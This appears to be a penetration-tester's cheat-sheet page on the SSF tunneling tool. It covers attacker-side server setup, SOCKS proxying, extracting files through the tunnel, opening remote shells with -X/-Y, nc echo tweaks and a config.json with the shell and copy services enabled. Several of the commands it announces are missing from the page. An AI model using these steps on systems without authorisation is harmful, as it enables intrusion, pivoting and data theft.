SSF
Secure Socket Funneling - Network tool and toolkit - TCP and UDP port forwarding, SOCKS proxy, remote shell, standalone and cross platform.
Source 1: https://github.com/securesocketfunneling/ssf
Source 2: https://securesocketfunneling.github.io/ssf/#home
How to extract files
Opening a server on the Attacker machine.
The (-l) is the IP of the attacker - without this flag it will listen on 0.0.0.0
The default port (-p) is 8011
-D: the attacker (server) will act as the SOCKS server
-F: the target (client) will act as the SOCKS server
./ssfcp can copy files through the tunnel
Opening a shell with SSF
-X: client opens a listening socket on the given port (10000)
-Y: client orders the server to open a listening socket on the given port (11000)
We can use just one of the options if we want:
The -X let us open a shell of the attacker on the target machine
The -Y let us open a shell of the target on our attacker machine
Use this options for Linux, Windows respectively to disable local echo:
stty -echo -icanon -isig min 1; nc 127.0.0.1 10000; stty echo icanon isig;stty -isig; nc 127.0.0.1 10000; stty isig;
To use copy and shell options, you need to specify the config.json accordingly:
{
"ssf": {
"arguments": "",
"circuit": [],
"http_proxy": {
"host": "",
"port": "",
"user_agent": "",
"credentials": {
"username": "",
"password": "",
"domain": "",
"reuse_ntlm": true,
"reuse_nego": true
}
},
"socks_proxy": {
"version": 5,
"host": "",
"port": "1080"
},
"tls" : {
"ca_cert_path": "./certs/trusted/ca.crt",
"cert_path": "./certs/certificate.crt",
"key_path": "./certs/private.key",
"key_password": "",
"dh_path": "./certs/dh4096.pem",
"cipher_alg": "DHE-RSA-AES256-GCM-SHA384"
},
"services": {
"datagram_forwarder": { "enable": true },
"datagram_listener": {
"enable": true,
"gateway_ports": false
},
"stream_forwarder": { "enable": true },
"stream_listener": {
"enable": true,
"gateway_ports": false
},
"copy": { "enable": true },
"shell": {
"enable": true,
"path": "/bin/bash",
"args": ""
},
"socks": { "enable": true }
}
}Last updated